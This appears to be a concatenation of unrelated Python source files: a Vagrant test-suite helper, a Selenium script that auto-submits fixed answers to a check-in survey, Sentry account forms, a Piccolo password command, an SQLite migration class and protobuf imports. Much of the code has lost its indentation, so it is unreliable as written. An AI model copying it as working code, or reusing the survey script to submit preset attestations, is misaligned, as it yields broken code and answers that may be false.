"""
    Halt and destroy the virtual machine
"""
with lcd(os.path.dirname(__file__)):
if os.path.exists('Vagrantfile'):
local('vagrant halt')
if version() >= (0, 9, 99):
local('vagrant destroy -f')
else:
local('vagrant destroy')
def base_boxes():
"""
Get the list of vagrant base boxes to use
The default is to get the list of all base boxes.
This can be overridden with the VAGRANT_BOXES environment variable.
"""
boxes = os.environ.get('VAGRANT_BOXES')
if boxes is not None:
return boxes.split()
else:
res = local('vagrant box list', capture=True)
if res.failed:
return []
else:
return res.splitlines()
class VagrantTestSuite(unittest.BaseTestSuite):
"""
Test suite with vagrant support
"""
def __init__(self, base_boxes):
self.base_boxes = base_boxes
self.current_box = None
unittest.BaseTestSuite.__init__(self)
def addTest(self, test):
test._suite = self
unittest.BaseTestSuite.addTest(self, test)
def run(self, result):
"""
Run the test suite on all the virtual machines
"""
# Clean up
halt_and_destroy()
for base_box in self.base_boxes:
# Start a virtual machine using this base box
self.current_box = base_box
self.start_box()
# Clear fabric connection cache
with self.settings():
if env.host_string in connections:
del connections[env.host_string]
# Make sure the vagrant user can sudo to any user
with self.settings():
require.sudoer('vagrant')
# Make sure the package index is up to date
with self.settings():
fabtools.deb.update_index()
# Run the test suite
unittest.BaseTestSuite.run(self, result)
# Stop the virtual machine and clean up
self.stop_box()
def start_box(self):
"""
Spin up a new vagrant box
"""
with lcd(os.path.dirname(__file__)):
# Create a fresh vagrant config file
local('rm -f Vagrantfile')
local('vagrant init %s' % self.current_box)
# Spin up the box
# (retry as it sometimes fails for no good reason)
local('vagrant up || vagrant up')
def ssh_config(self):
"""
Get SSH connection parameters for the current box
"""
with lcd(os.path.dirname(__file__)):
if version() >= (0, 9, 0):
command = 'ssh-config'
else:
command = 'ssh_config'
with settings(hide('running')):
output = local('vagrant %s' % command, capture=True)
config = {}
for line in output.splitlines()[1:]:
key, value = line.strip().split(' ', 2)
config[key] = value
return config
def stop_box(self):
"""
Spin down the vagrant box
"""
halt_and_destroy()
with lcd(os.path.dirname(__file__)):
local('rm -f Vagrantfile')
self.current_box = None
def settings(self, *args, **kwargs):
"""
Return a Fabric context manager with the right host settings
"""
config = self.ssh_config()
user = config['User']
hostname = config['HostName']
port = config['Port']
kwargs['host_string'] = "%s@%s:%s" % (user, hostname, port)
kwargs['user'] = user
kwargs['key_filename'] = config['IdentityFile']
kwargs['disable_known_hosts'] = True
return settings(*args, **kwargs)
class VagrantTestCase(unittest.TestCase):
"""
Test case with vagrant support
"""
def run(self, result=None):
"""
Run the test case within a Fabric context manager
"""
with self._suite.settings():
unittest.TestCase.run(self, result)
class VagrantFunctionTestCase(unittest.FunctionTestCase):
"""
Function test case with vagrant support
"""
def run(self, result=None):
"""
Run the test case within a Fabric context manager
"""
with self._suite.settings():
unittest.FunctionTestCase.run(self, result)
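# Illustrative usage sketch (not part of the original module): building a suite
# that runs a trivial check on every available base box. The check itself is
# hypothetical.
def example_suite():
    suite = VagrantTestSuite(base_boxes())
    def check_kernel():
        run('uname -s')
    suite.addTest(VagrantFunctionTestCase(check_kernel))
    return suite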
|
py | b41061d4418cd06b2e724d1247778316410b7efd | from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.common.exceptions import TimeoutException
import time
from random import uniform
def open_form(browser):
print("Starting form...")
# Wait for start survey button to appear
check_in_btn = WebDriverWait(browser, 10).until(
EC.element_to_be_clickable((By.CSS_SELECTOR, "button[data-qa-id='check-in-button']"))
)
check_in_btn.click()
def answer_question(browser, input_id_suffix):
# Wait for answer button to appear
answer_inputs = WebDriverWait(browser, 10).until(
EC.presence_of_all_elements_located((By.CSS_SELECTOR, f"[id$={input_id_suffix}]"))
)
# Input isn't clickable, so click its parent element instead
last_answer_input = answer_inputs[-1]
last_answer_lbl = last_answer_input.find_element(By.XPATH, "..")
last_answer_lbl.click()
def submit_survey(browser):
print("Submitting form...")
submit_btn = browser.find_element(By.CLASS_NAME, "MuiButton-containedPrimary")
submit_btn.click()
print("Form submitted...")
def fill_form(browser):
open_form(browser)
answer_input_id_suffixes = [
"yes",
"no",
"no",
"no",
"no",
"no",
"no"
]
print("Filling out form...")
for input_id_suffix in answer_input_id_suffixes:
answer_question(browser, input_id_suffix)
time.sleep(uniform(1, 3)) # seconds
# TODO Make a delay function
submit_survey(browser)
def verify_form_completion(browser):
# Wait for form completion to appear
try:
form_completed_elem = WebDriverWait(browser, 5).until(
EC.presence_of_element_located((By.ID, "lastCheckInLabel"))
)
form_completion_success = True
except TimeoutException:
form_completion_success = False
return form_completion_success
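# Illustrative usage sketch (not part of the original script); the URL below is
# a placeholder, not the real check-in form address.
def run_check_in(form_url="https://example.com/check-in"):
    browser = webdriver.Chrome()
    try:
        browser.get(form_url)
        fill_form(browser)
        if verify_form_completion(browser):
            print("Check-in confirmed")
        else:
            print("Could not confirm check-in")
    finally:
        browser.quit()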
# TODO: validate using the datetime in the time element to ensure the most recent form filling succeeded |
py | b4106278bdebbd76d1b4a0926e2a45a305ac7e50 | """
sentry.web.forms.accounts
~~~~~~~~~~~~~~~~~~~~~~~~~
:copyright: (c) 2010-2014 by the Sentry Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
from __future__ import absolute_import
import pytz
import six
from datetime import datetime
from django import forms
from django.conf import settings
from django.contrib.auth import authenticate, get_user_model
from django.db.models import Q
from django.utils.text import capfirst, mark_safe
from django.utils.translation import ugettext_lazy as _
from sentry import newsletter, options
from sentry.auth import password_validation
from sentry.app import ratelimiter
from sentry.constants import LANGUAGES
from sentry.models import (Organization, OrganizationStatus, User, UserOption, UserOptionValue)
from sentry.security import capture_security_activity
from sentry.utils.auth import find_users, logger
from sentry.web.forms.fields import CustomTypedChoiceField, ReadOnlyTextField
from six.moves import range
def _get_timezone_choices():
results = []
for tz in pytz.common_timezones:
now = datetime.now(pytz.timezone(tz))
offset = now.strftime('%z')
results.append((int(offset), tz, '(UTC%s) %s' % (offset, tz)))
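    # Decorate-sort-undecorate: order by numeric UTC offset, then drop the
    # offset so each entry is a (timezone, label) choice tuple.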
results.sort()
for i in range(len(results)):
results[i] = results[i][1:]
return results
TIMEZONE_CHOICES = _get_timezone_choices()
class AuthenticationForm(forms.Form):
username = forms.CharField(
label=_('Account'),
max_length=128,
widget=forms.TextInput(attrs={
'placeholder': _('username or email'),
'tabindex': 1,
}),
)
password = forms.CharField(
label=_('Password'),
widget=forms.PasswordInput(attrs={
'placeholder': _('password'),
'tabindex': 2,
}),
)
error_messages = {
'invalid_login':
_(
"Please enter a correct %(username)s and password. "
"Note that both fields may be case-sensitive."
),
'rate_limited':
_("You have made too many failed authentication "
"attempts. Please try again later."),
'no_cookies':
_(
"Your Web browser doesn't appear to have cookies "
"enabled. Cookies are required for logging in."
),
'inactive':
_("This account is inactive."),
}
def __init__(self, request=None, *args, **kwargs):
"""
If request is passed in, the form will validate that cookies are
enabled. Note that the request (a HttpRequest object) must have set a
cookie with the key TEST_COOKIE_NAME and value TEST_COOKIE_VALUE before
running this validation.
"""
self.request = request
self.user_cache = None
super(AuthenticationForm, self).__init__(*args, **kwargs)
# Set the label for the "username" field.
UserModel = get_user_model()
self.username_field = UserModel._meta.get_field(UserModel.USERNAME_FIELD)
if not self.fields['username'].label:
self.fields['username'].label = capfirst(self.username_field.verbose_name)
def clean_username(self):
value = (self.cleaned_data.get('username') or '').strip()
if not value:
return
return value.lower()
def is_rate_limited(self):
if self._is_ip_rate_limited():
return True
if self._is_user_rate_limited():
return True
return False
def _is_ip_rate_limited(self):
limit = options.get('auth.ip-rate-limit')
if not limit:
return False
ip_address = self.request.META['REMOTE_ADDR']
return ratelimiter.is_limited(
'auth:ip:{}'.format(ip_address),
limit,
)
def _is_user_rate_limited(self):
limit = options.get('auth.user-rate-limit')
if not limit:
return False
username = self.cleaned_data.get('username')
if not username:
return False
return ratelimiter.is_limited(
u'auth:username:{}'.format(username),
limit,
)
def clean(self):
username = self.cleaned_data.get('username')
password = self.cleaned_data.get('password')
if not (username and password):
raise forms.ValidationError(
self.error_messages['invalid_login'] %
{'username': self.username_field.verbose_name}
)
if self.is_rate_limited():
logger.info(
'user.auth.rate-limited',
extra={
'ip_address': self.request.META['REMOTE_ADDR'],
'username': username,
}
)
raise forms.ValidationError(self.error_messages['rate_limited'])
self.user_cache = authenticate(username=username, password=password)
if self.user_cache is None:
raise forms.ValidationError(
self.error_messages['invalid_login'] %
{'username': self.username_field.verbose_name}
)
self.check_for_test_cookie()
return self.cleaned_data
def check_for_test_cookie(self):
if self.request and not self.request.session.test_cookie_worked():
raise forms.ValidationError(self.error_messages['no_cookies'])
def get_user_id(self):
if self.user_cache:
return self.user_cache.id
return None
def get_user(self):
return self.user_cache
class PasswordlessRegistrationForm(forms.ModelForm):
name = forms.CharField(
label=_('Name'),
max_length=30,
widget=forms.TextInput(attrs={'placeholder': 'Jane Doe'}),
required=True
)
username = forms.EmailField(
label=_('Email'),
max_length=128,
widget=forms.TextInput(attrs={'placeholder': '[email protected]'}),
required=True
)
subscribe = CustomTypedChoiceField(
coerce=lambda x: six.text_type(x) == u'1',
label=_("Email updates"),
choices=(
(1, 'Yes, I would like to receive updates via email'),
(0, "No, I'd prefer not to receive these updates"),
),
widget=forms.RadioSelect,
required=True,
initial=False,
)
def __init__(self, *args, **kwargs):
super(PasswordlessRegistrationForm, self).__init__(*args, **kwargs)
if not newsletter.is_enabled():
del self.fields['subscribe']
else:
# NOTE: the text here is duplicated within the ``NewsletterConsent`` component
# in the UI
notice = (
"We'd love to keep you updated via email with product and feature "
"announcements, promotions, educational materials, and events. "
"Our updates focus on relevant information, and we'll never sell "
"your data to third parties. See our "
"<a href=\"{privacy_link}\">Privacy Policy</a> for more details."
)
self.fields['subscribe'].help_text = mark_safe(
notice.format(privacy_link=settings.PRIVACY_URL))
class Meta:
fields = ('username', 'name')
model = User
def clean_username(self):
value = (self.cleaned_data.get('username') or '').strip()
if not value:
return
if User.objects.filter(username__iexact=value).exists():
raise forms.ValidationError(
_('An account is already registered with that email address.'))
return value.lower()
def save(self, commit=True):
user = super(PasswordlessRegistrationForm, self).save(commit=False)
user.email = user.username
if commit:
user.save()
if self.cleaned_data.get('subscribe'):
newsletter.create_or_update_subscriptions(
user, list_ids=newsletter.get_default_list_ids())
return user
class RegistrationForm(PasswordlessRegistrationForm):
password = forms.CharField(
required=True,
widget=forms.PasswordInput(attrs={'placeholder': 'something super secret'}),
)
def clean_password(self):
password = self.cleaned_data['password']
password_validation.validate_password(password)
return password
def save(self, commit=True):
user = super(RegistrationForm, self).save(commit=False)
user.set_password(self.cleaned_data['password'])
if commit:
user.save()
if self.cleaned_data.get('subscribe'):
newsletter.create_or_update_subscriptions(
user, list_ids=newsletter.get_default_list_ids())
return user
class RecoverPasswordForm(forms.Form):
user = forms.CharField(
label=_('Account'),
max_length=128,
widget=forms.TextInput(attrs={'placeholder': _('username or email')}),
)
def clean_user(self):
value = (self.cleaned_data.get('user') or '').strip()
if not value:
return
users = find_users(value, with_valid_password=False)
if not users:
raise forms.ValidationError(_("We were unable to find a matching user."))
users = [u for u in users if not u.is_managed]
if not users:
raise forms.ValidationError(
_(
"The account you are trying to recover is managed and does not support password recovery."
)
)
if len(users) > 1:
raise forms.ValidationError(
_("Multiple accounts were found matching this email address.")
)
return users[0]
class ChangePasswordRecoverForm(forms.Form):
password = forms.CharField(widget=forms.PasswordInput())
def clean_password(self):
password = self.cleaned_data['password']
password_validation.validate_password(password)
return password
class EmailForm(forms.Form):
alt_email = forms.EmailField(
label=_('New Email'),
required=False,
help_text='Designate an alternative email for this account',
)
password = forms.CharField(
label=_('Current password'),
widget=forms.PasswordInput(),
help_text=_('You will need to enter your current account password to make changes.'),
required=True,
)
def __init__(self, user, *args, **kwargs):
self.user = user
super(EmailForm, self).__init__(*args, **kwargs)
needs_password = user.has_usable_password()
if not needs_password:
del self.fields['password']
def clean_password(self):
value = self.cleaned_data.get('password')
if value and not self.user.check_password(value):
raise forms.ValidationError(_('The password you entered is not correct.'))
elif not value:
raise forms.ValidationError(
_('You must confirm your current password to make changes.')
)
return value
class AccountSettingsForm(forms.Form):
name = forms.CharField(required=True, label=_('Name'), max_length=30)
username = forms.CharField(label=_('Username'), max_length=128)
email = forms.EmailField(label=_('Email'))
new_password = forms.CharField(
label=_('New password'),
widget=forms.PasswordInput(),
required=False,
# help_text=password_validation.password_validators_help_text_html(),
)
verify_new_password = forms.CharField(
label=_('Verify new password'),
widget=forms.PasswordInput(),
required=False,
)
password = forms.CharField(
label=_('Current password'),
widget=forms.PasswordInput(),
help_text='You will need to enter your current account password to make changes.',
required=False,
)
def __init__(self, user, request, *args, **kwargs):
self.user = user
self.request = request
super(AccountSettingsForm, self).__init__(*args, **kwargs)
needs_password = user.has_usable_password()
if self.user.is_managed:
# username and password always managed, email and
# name optionally managed
for field in ('email', 'name', 'username'):
if field == 'username' or field in settings.SENTRY_MANAGED_USER_FIELDS:
self.fields[field] = ReadOnlyTextField(label=self.fields[field].label)
if field == 'email':
needs_password = False
del self.fields['new_password']
del self.fields['verify_new_password']
# don't show username field if its the same as their email address
if self.user.email == self.user.username:
del self.fields['username']
if not needs_password:
del self.fields['password']
def is_readonly(self):
if self.user.is_managed:
return set(('email', 'name')) == set(settings.SENTRY_MANAGED_USER_FIELDS)
return False
def _clean_managed_field(self, field):
if self.user.is_managed and (
field == 'username' or field in settings.SENTRY_MANAGED_USER_FIELDS
):
return getattr(self.user, field)
return self.cleaned_data[field]
def clean_email(self):
value = self._clean_managed_field('email').lower()
if self.user.email.lower() == value:
return value
if User.objects.filter(Q(email__iexact=value) | Q(username__iexact=value)).exclude(
id=self.user.id
).exists():
raise forms.ValidationError(
_("There was an error adding %s: that email is already in use") %
self.cleaned_data['email']
)
return value
def clean_name(self):
return self._clean_managed_field('name')
def clean_username(self):
value = self._clean_managed_field('username')
if User.objects.filter(username__iexact=value).exclude(id=self.user.id).exists():
raise forms.ValidationError(_("That username is already in use."))
return value
def clean_password(self):
value = self.cleaned_data.get('password')
if value and not self.user.check_password(value):
            raise forms.ValidationError(_('The password you entered is not correct.'))
        elif not value and (
            self.cleaned_data.get('email', self.user.email) != self.user.email or
            self.cleaned_data.get('new_password')
        ):
            raise forms.ValidationError(_('You must confirm your current password to make changes.'))
return value
def clean_verify_new_password(self):
new_password = self.cleaned_data.get('new_password')
if new_password:
verify_new_password = self.cleaned_data.get('verify_new_password')
if verify_new_password is None:
                raise forms.ValidationError(_('You must verify your new password.'))
            if new_password != verify_new_password:
                raise forms.ValidationError(_('Your new password and verify new password must match.'))
return verify_new_password
def clean_new_password(self):
new_password = self.cleaned_data.get('new_password')
if new_password:
password_validation.validate_password(new_password)
return new_password
def save(self, commit=True):
if self.cleaned_data.get('new_password'):
self.user.set_password(self.cleaned_data['new_password'])
self.user.refresh_session_nonce(self.request)
capture_security_activity(
account=self.user,
type='password-changed',
actor=self.request.user,
ip_address=self.request.META['REMOTE_ADDR'],
send_email=True,
)
self.user.name = self.cleaned_data['name']
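        # If the username currently mirrors the email address, keep them in sync
        # below when the email changes (unless the new email is already taken
        # as someone else's username).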
if self.cleaned_data['email'] != self.user.email:
new_username = self.user.email == self.user.username
else:
new_username = False
self.user.email = self.cleaned_data['email']
if self.cleaned_data.get('username'):
self.user.username = self.cleaned_data['username']
elif new_username and not User.objects.filter(username__iexact=self.user.email).exists():
self.user.username = self.user.email
if commit:
self.user.save()
return self.user
class AppearanceSettingsForm(forms.Form):
language = forms.ChoiceField(
label=_('Language'),
choices=LANGUAGES,
required=False,
widget=forms.Select(attrs={'class': 'input-xlarge'})
)
stacktrace_order = forms.ChoiceField(
label=_('Stacktrace order'),
choices=(
            ('-1', _('Default (let Sentry decide)')),
            ('1', _('Most recent call last')),
            ('2', _('Most recent call first')),
),
help_text=_('Choose the default ordering of frames in stacktraces.'),
required=False,
widget=forms.Select(attrs={'class': 'input-xlarge'})
)
timezone = forms.ChoiceField(
label=_('Time zone'),
choices=TIMEZONE_CHOICES,
required=False,
widget=forms.Select(attrs={'class': 'input-xxlarge'})
)
clock_24_hours = forms.BooleanField(
label=_('Use a 24-hour clock'),
required=False,
)
def __init__(self, user, *args, **kwargs):
self.user = user
super(AppearanceSettingsForm, self).__init__(*args, **kwargs)
def save(self):
# Save user language
UserOption.objects.set_value(
user=self.user,
key='language',
value=self.cleaned_data['language'],
)
# Save stacktrace options
UserOption.objects.set_value(
user=self.user,
key='stacktrace_order',
value=self.cleaned_data['stacktrace_order'],
)
# Save time zone options
UserOption.objects.set_value(
user=self.user,
key='timezone',
value=self.cleaned_data['timezone'],
)
# Save clock 24 hours option
UserOption.objects.set_value(
user=self.user,
key='clock_24_hours',
value=self.cleaned_data['clock_24_hours'],
)
return self.user
class NotificationReportSettingsForm(forms.Form):
organizations = forms.ModelMultipleChoiceField(
queryset=Organization.objects.none(),
required=False,
widget=forms.CheckboxSelectMultiple(),
)
def __init__(self, user, *args, **kwargs):
self.user = user
super(NotificationReportSettingsForm, self).__init__(*args, **kwargs)
org_queryset = Organization.objects.filter(
status=OrganizationStatus.VISIBLE,
member_set__user=user,
)
disabled_orgs = set(
UserOption.objects.get_value(
user=user,
key='reports:disabled-organizations',
default=[],
)
)
self.fields['organizations'].queryset = org_queryset
self.fields['organizations'].initial = [
o.id for o in org_queryset if o.id not in disabled_orgs
]
def save(self):
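        # The user option stores the *disabled* organizations, so persist the
        # complement of whatever the user left checked.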
enabled_orgs = set((o.id for o in self.cleaned_data.get('organizations')))
all_orgs = set(self.fields['organizations'].queryset.values_list('id', flat=True))
UserOption.objects.set_value(
user=self.user,
key='reports:disabled-organizations',
value=list(all_orgs.difference(enabled_orgs)),
)
class NotificationDeploySettingsForm(forms.Form):
    CHOICES = [
        (UserOptionValue.all_deploys, _('All deploys')),
        (UserOptionValue.committed_deploys_only, _('Deploys with your commits')),
        (UserOptionValue.no_deploys, _('Never')),
    ]
notifications = forms.ChoiceField(
choices=CHOICES,
required=False,
widget=forms.RadioSelect(),
)
def __init__(self, user, organization, *args, **kwargs):
self.user = user
self.organization = organization
super(NotificationDeploySettingsForm, self).__init__(*args, **kwargs)
self.fields['notifications'].label = "" # hide the label
deploy_setting = UserOption.objects.get_value(
user=user,
organization=self.organization,
key='deploy-emails',
default=UserOptionValue.committed_deploys_only,
)
self.fields['notifications'].initial = deploy_setting
def save(self):
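        # Read the raw, prefix-namespaced form data; only persist a value when
        # the field was actually submitted.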
value = self.data.get('{}-notifications'.format(self.prefix), None)
if value is not None:
UserOption.objects.set_value(
user=self.user,
organization=self.organization,
key='deploy-emails',
value=value,
)
class NotificationSettingsForm(forms.Form):
alert_email = forms.EmailField(
label=_('Email'),
help_text=_('Designate an alternative email address to send email notifications to.'),
required=False
)
subscribe_by_default = forms.BooleanField(
label=_('Automatically subscribe to alerts for new projects'),
help_text=_(
"When enabled, you'll automatically subscribe to alerts when you create or join a project."
),
required=False,
)
workflow_notifications = forms.ChoiceField(
label=_('Preferred workflow subscription level for new projects'),
choices=[
(UserOptionValue.all_conversations, "Receive workflow updates for all issues."),
(UserOptionValue.participating_only,
"Receive workflow updates only for issues that I am participating in or have subscribed to."),
(UserOptionValue.no_conversations, "Never receive workflow updates."),
],
help_text=_("This will be automatically set as your subscription preference when you create or join a project. It has no effect on existing projects."),
required=False,
)
self_notifications = forms.BooleanField(
label=_('Receive notifications about my own activity'),
help_text=_(
'Enable this if you wish to receive emails for your own actions, as well as others.'
),
required=False,
)
self_assign_issue = forms.BooleanField(
label=_('Claim unassigned issues when resolving them'),
help_text=_(
"When enabled, you'll automatically be assigned to unassigned issues when marking them as resolved."
),
required=False,
)
def __init__(self, user, *args, **kwargs):
self.user = user
super(NotificationSettingsForm, self).__init__(*args, **kwargs)
self.fields['alert_email'].initial = UserOption.objects.get_value(
user=self.user,
key='alert_email',
default=user.email,
)
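        # Boolean preferences are stored as '1'/'0' strings in UserOption.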
self.fields['subscribe_by_default'].initial = (
UserOption.objects.get_value(
user=self.user,
key='subscribe_by_default',
default='1',
) == '1'
)
self.fields['workflow_notifications'].initial = UserOption.objects.get_value(
user=self.user,
key='workflow:notifications',
default=UserOptionValue.all_conversations,
project=None,
)
self.fields['self_notifications'].initial = UserOption.objects.get_value(
user=self.user, key='self_notifications', default='0'
) == '1'
self.fields['self_assign_issue'].initial = UserOption.objects.get_value(
user=self.user, key='self_assign_issue', default='0'
) == '1'
def get_title(self):
return "General"
def save(self):
UserOption.objects.set_value(
user=self.user,
key='alert_email',
value=self.cleaned_data['alert_email'],
)
UserOption.objects.set_value(
user=self.user,
key='subscribe_by_default',
value='1' if self.cleaned_data['subscribe_by_default'] else '0',
)
UserOption.objects.set_value(
user=self.user,
key='self_notifications',
value='1' if self.cleaned_data['self_notifications'] else '0',
)
UserOption.objects.set_value(
user=self.user,
key='self_assign_issue',
value='1' if self.cleaned_data['self_assign_issue'] else '0',
)
workflow_notifications_value = self.cleaned_data.get('workflow_notifications')
if not workflow_notifications_value:
UserOption.objects.unset_value(
user=self.user,
key='workflow:notifications',
project=None,
)
else:
UserOption.objects.set_value(
user=self.user,
key='workflow:notifications',
value=workflow_notifications_value,
project=None,
)
class ProjectEmailOptionsForm(forms.Form):
alert = forms.BooleanField(required=False)
workflow = forms.ChoiceField(
choices=[
(UserOptionValue.no_conversations, 'Nothing'),
(UserOptionValue.participating_only, 'Participating'),
(UserOptionValue.all_conversations, 'Everything'),
],
)
    email = forms.ChoiceField(
        label="",
        choices=(),
        required=False,
        widget=forms.Select(),
    )
def __init__(self, project, user, *args, **kwargs):
self.project = project
self.user = user
super(ProjectEmailOptionsForm, self).__init__(*args, **kwargs)
has_alerts = project.is_user_subscribed_to_mail_alerts(user)
# This allows users who have entered an alert_email value or have specified an email
# for notifications to keep their settings
emails = [e.email for e in user.get_verified_emails()]
alert_email = UserOption.objects.get_value(self.user, 'alert_email')
specified_email = UserOption.objects.get_value(self.user, 'mail:email', project=project)
emails.extend([user.email, alert_email, specified_email])
choices = [(email, email) for email in sorted(set(emails)) if email]
self.fields['email'].choices = choices
self.fields['alert'].initial = has_alerts
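        # The project-level workflow setting falls back to the user's global
        # preference, and finally to "all conversations" if neither is set.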
self.fields['workflow'].initial = UserOption.objects.get_value(
user=self.user,
project=self.project,
key='workflow:notifications',
default=UserOption.objects.get_value(
user=self.user,
project=None,
key='workflow:notifications',
default=UserOptionValue.all_conversations,
),
)
self.fields['email'].initial = specified_email or alert_email or user.email
def save(self):
UserOption.objects.set_value(
user=self.user,
key='mail:alert',
value=int(self.cleaned_data['alert']),
project=self.project,
)
UserOption.objects.set_value(
user=self.user,
key='workflow:notifications',
value=self.cleaned_data['workflow'],
project=self.project,
)
if self.cleaned_data['email']:
UserOption.objects.set_value(
user=self.user,
key='mail:email',
value=self.cleaned_data['email'],
project=self.project,
)
else:
UserOption.objects.unset_value(self.user, self.project, 'mail:email')
class TwoFactorForm(forms.Form):
otp = forms.CharField(
label=_('Authenticator code'),
max_length=20,
widget=forms.TextInput(
attrs={
'placeholder': _('Code from authenticator'),
'autofocus': True,
}
),
)
class ConfirmPasswordForm(forms.Form):
password = forms.CharField(
label=_('Sentry account password'),
widget=forms.PasswordInput(),
        help_text=_('You will need to enter your current Sentry account password to make changes.'),
required=True,
)
def __init__(self, user, *args, **kwargs):
self.user = user
super(ConfirmPasswordForm, self).__init__(*args, **kwargs)
needs_password = user.has_usable_password()
if not needs_password:
del self.fields['password']
def clean_password(self):
value = self.cleaned_data.get('password')
if value and not self.user.check_password(value):
raise forms.ValidationError(_('The password you entered is not correct.'))
elif not value:
raise forms.ValidationError(
_('You must confirm your current password to make changes.')
)
return value
|
py | b4106333fc20177a5a393f9b33ff459646271790 | import sys
from piccolo.apps.user.commands.create import (
get_confirmed_password,
get_password,
get_username,
)
from piccolo.apps.user.tables import BaseUser
def change_password():
"""
Change a user's password.
"""
username = get_username()
password = get_password()
confirmed_password = get_confirmed_password()
    if password != confirmed_password:
sys.exit("Passwords don't match!")
BaseUser.update_password_sync(user=username, password=password)
print(f"Updated password for {username}")
print(
"If using session auth, we recommend invalidating this user's session."
)
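# Note: this is typically wired up as a Piccolo app command, e.g. invoked via
# `piccolo user change_password` (assumed CLI entry point, not shown here).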
|
py | b41064223d6e1833f70ba497bcecb8810ab6215a | # -*- coding: utf-8 -*-
"""
This software is licensed under the License (MIT) located at
https://github.com/ephreal/rollbot/Licence
Please see the license for any restrictions or rights granted to you by the
License.
"""
from abc import ABC
import sqlite3
from sqlite3 import OperationalError
class Migration(ABC):
def __init__(self, db="discord.db"):
self.version = None
self.connection = sqlite3.connect(db)
self.description = "This is the abstract base class"
self.breaks = "These changes break no functionality"
if self.get_schema_version() == self.version:
self.migrated = True
else:
self.migrated = False
def migrate(self):
"""
Applies a migration to the database
"""
pass
def revert(self):
"""
Reverts changes done by this migration
"""
pass
def requisites(self):
"""
This must return true for the migration to run.
"""
pass
def revert_requisites(self):
"""
This must return True for the database revert to run
"""
pass
def upgrade_table_version(self, table):
"""
Increments the version of the table specified
"""
cursor = self.connection.cursor()
try:
cursor.execute("select version from db_versions where db=?",
(table,))
version = cursor.fetchall()[0][0]
version += 1
cursor.execute("""update db_versions set version = ?
where db = ?""", (version, table,))
except IndexError:
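            # No version row exists for this table yet; register it at version 0.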
version = 0
cursor.execute("""insert into db_versions (db,version) values
(?, 0)""", (table,))
def downgrade_table_version(self, table):
"""
Decrements the version of the table specified
"""
cursor = self.connection.cursor()
try:
cursor.execute("select version from db_versions where db=?",
(table, ))
version = cursor.fetchall()[0][0]
version -= 1
if version < 0:
# The table is slated for removal, remove the version from the
# db_versions table now
cursor.execute("delete from db_versions where db=?", (table, ))
else:
cursor.execute("""update db_versions set version = ?
where db=?""", (version, table, ))
except IndexError:
pass
def get_schema_version(self):
"""Returns the current schema version of the database"""
cursor = self.connection.cursor()
sql = """select version from db_versions where db='schema'"""
try:
cursor.execute(sql)
version = cursor.fetchall()[0][0]
except sqlite3.OperationalError:
version = -1
except IndexError:
version = -1
return version
def failed_migration_pending(self, tables):
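        """
        Returns True if the schema version says this migration has already run
        but one of the expected tables is missing (i.e. a previous migration
        attempt only partially completed).
        """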
        if self.get_schema_version() != self.version:
            return False
cursor = self.connection.cursor()
for table in tables:
try:
sql = f"select * from {table} where id=1"
cursor.execute(sql)
except OperationalError:
return True
return False
|
py | b4106592a6ee5d9ee8fdbf03348a0d9321637394 | # -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: google/ads/googleads_v2/proto/common/criteria.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from google.ads.google_ads.v2.proto.enums import age_range_type_pb2 as google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_age__range__type__pb2
from google.ads.google_ads.v2.proto.enums import app_payment_model_type_pb2 as google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_app__payment__model__type__pb2
from google.ads.google_ads.v2.proto.enums import content_label_type_pb2 as google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_content__label__type__pb2
from google.ads.google_ads.v2.proto.enums import day_of_week_pb2 as google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_day__of__week__pb2
from google.ads.google_ads.v2.proto.enums import device_pb2 as google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_device__pb2
from google.ads.google_ads.v2.proto.enums import gender_type_pb2 as google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_gender__type__pb2
from google.ads.google_ads.v2.proto.enums import hotel_date_selection_type_pb2 as google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_hotel__date__selection__type__pb2
from google.ads.google_ads.v2.proto.enums import income_range_type_pb2 as google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_income__range__type__pb2
from google.ads.google_ads.v2.proto.enums import interaction_type_pb2 as google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_interaction__type__pb2
from google.ads.google_ads.v2.proto.enums import keyword_match_type_pb2 as google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_keyword__match__type__pb2
from google.ads.google_ads.v2.proto.enums import listing_custom_attribute_index_pb2 as google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_listing__custom__attribute__index__pb2
from google.ads.google_ads.v2.proto.enums import listing_group_type_pb2 as google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_listing__group__type__pb2
from google.ads.google_ads.v2.proto.enums import location_group_radius_units_pb2 as google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_location__group__radius__units__pb2
from google.ads.google_ads.v2.proto.enums import minute_of_hour_pb2 as google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_minute__of__hour__pb2
from google.ads.google_ads.v2.proto.enums import parental_status_type_pb2 as google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_parental__status__type__pb2
from google.ads.google_ads.v2.proto.enums import preferred_content_type_pb2 as google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_preferred__content__type__pb2
from google.ads.google_ads.v2.proto.enums import product_bidding_category_level_pb2 as google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_product__bidding__category__level__pb2
from google.ads.google_ads.v2.proto.enums import product_channel_pb2 as google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_product__channel__pb2
from google.ads.google_ads.v2.proto.enums import product_channel_exclusivity_pb2 as google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_product__channel__exclusivity__pb2
